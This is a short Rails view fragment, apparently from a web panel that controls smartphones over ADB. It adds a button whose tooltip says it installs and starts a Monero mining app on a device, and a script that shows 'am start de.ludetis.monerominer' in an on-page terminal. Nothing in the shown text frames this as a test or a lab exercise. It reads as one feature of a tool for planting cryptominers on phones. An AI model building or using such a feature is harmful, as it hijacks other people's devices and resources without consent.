<span tooltip="OS SUPPORT: <= 10

              REQUISITE&nbsp;&nbsp;&nbsp;&nbsp;: ADB

              DESCRIPTION: Install and start a Monero minning app on the device" flow="up">
  <%= link_to '../smartphones/crypto_minner?smartphone_id=' + smartphone.id.to_s,
    method: :get, :remote => true , :class => "adb_link", :id => "crypto_minner_link" do %>
    <%= image_tag "crypto_minner.png", :alt => "System Info", :class => "smartphone-icon adb_proc" %>
  <% end %>
</span>
<script>
  $("#crypto_minner_link").on('click',function(event){
      $( ".Terminal__body" ).trigger("write",[" > ", "am start de.ludetis.monerominer", ["Starting . . ."] ]);
  });
</script>
